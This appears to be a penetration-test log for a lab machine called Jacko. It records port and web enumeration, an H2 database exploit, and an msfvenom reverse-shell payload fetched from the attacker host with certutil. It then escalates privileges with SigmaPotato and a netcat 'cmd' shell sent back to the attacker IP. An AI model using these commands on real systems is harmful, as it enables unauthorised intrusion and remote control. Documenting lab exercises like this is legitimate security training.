Jacko
๐งช Pentest Log: {{date:2025-08-04}}
๐ Target Information
- Machine Name: Jacko
- IP Address: 192.168.123.66
- Operating System: Windows
ip=192.168.123.66
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 135
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 8082
H2 1.4.199 (2019-03-13)
Google "H2 1.4.199 (2019-03-13) exploit", found
https://www.exploit-db.com/exploits/49384
Port 9092
๐ฃ Exploitation / Foothold
๐ Vulnerability Summary
- Service / Port: 8082
- Vulnerability Type: SQL Code Execution
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=8082 -f exe -o shell.exe
certutil -split -urlcache -f http://192.168.45.163/shell.exe C:\\Users\\tony\\shell.exe
./shell.exe
๐งฌ Privilege Escalation
๐ค Current Access
- User: tony
- Groups: N/A
- Shell Type: reverse tcp shell
๐ Enumeration
Prvi Check
whoami /priv
found
SeImpersonatePrivilege Impersonate a client after authentication Enabled
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
certutil -urlcache -f http://192.168.45.163/SigmaPotato.exe C:\Users\tony\SigmaPotato.exe
certutil -urlcache -f http://192.168.45.163/nc64.exe C:\Users\tony\nc.exe
- Smash to Administrator
./SigmaPotato.exe "nc.exe 192.168.45.163 9092 -e cmd"
nc -lvnp 9092